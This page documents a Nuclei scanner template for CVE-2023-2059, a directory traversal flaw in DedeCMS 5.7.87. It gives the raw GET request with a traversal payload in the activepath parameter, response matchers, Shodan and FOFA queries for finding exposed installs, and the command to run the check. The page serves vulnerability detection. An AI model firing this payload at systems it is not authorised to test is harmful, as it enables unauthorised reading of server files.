DedeCMS 5.7.87 - Directory Traversal
ID: CVE-2023-2059
Severity: medium
Author: pussycat0x
Tags: cve,cve2023,dedecms,lfi
Description
Section titled “Description”Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
YAML Source
Section titled “YAML Source”id: CVE-2023-2059
info: name: DedeCMS 5.7.87 - Directory Traversal author: pussycat0x severity: medium description: | Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter. reference: - https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md - https://vuldb.com/?ctiid.225944 - https://vuldb.com/?id.225944 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-2059 cwe-id: CWE-28 epss-score: 0.0012 epss-percentile: 0.46305 cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dedecms product: dedecms shodan-query: - http.html:"dedecms" - cpe:"cpe:2.3:a:dedecms:dedecms" fofa-query: - app="DedeCMS" - app="dedecms" - body="dedecms" tags: cve,cve2023,dedecms,lfi
http: - raw: - | GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "dirname(__FILE__)" - "$cfg_basedir" - "dedecms" condition: and case-insensitive: true
- type: status status: - 200# digest: 4a0a004730450220177d6898a2efd2edee9276f24e4156e64b02bf2d73370ccef7b51376b3f5e645022100810e7a9341eccf99161b621831748b0ac1e6ac52bd5578e18195e26507c03c86:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2059.yaml"